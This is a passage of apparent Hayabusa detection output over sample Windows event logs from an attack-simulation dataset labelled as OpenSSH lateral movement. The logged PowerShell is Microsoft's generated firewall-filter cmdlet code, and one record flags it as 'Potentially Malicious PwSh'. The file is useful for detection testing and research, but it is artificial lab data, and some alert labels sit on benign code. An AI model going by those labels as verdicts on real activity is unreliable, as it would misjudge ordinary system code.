[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.299 
+09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( 
[Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
